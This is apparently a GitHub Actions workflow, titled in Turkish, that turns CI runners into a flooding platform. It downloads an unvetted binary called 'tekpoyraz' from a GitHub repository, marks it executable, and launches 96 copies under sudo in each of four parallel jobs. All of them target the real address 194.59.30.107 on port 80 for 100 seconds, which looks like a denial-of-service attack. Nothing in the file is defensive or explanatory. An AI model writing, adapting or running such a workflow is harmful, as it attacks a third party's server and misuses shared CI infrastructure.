name: Ubuntu VDS 20 saniye tek poraz

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
       instance: [1, 2, 3, 4]


    steps:
      - name: OK !
        run: |
          wget https://github.com/Paraloxd/tekpoyraz/raw/refs/heads/main/tekpoyraz -O tekpoyraz
          chmod +x tekpoyraz
          PIDS=()
          for i in {1..96}; do
            sudo timeout 100 ./tekpoyraz 194.59.30.107 80 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 100
          exit 0
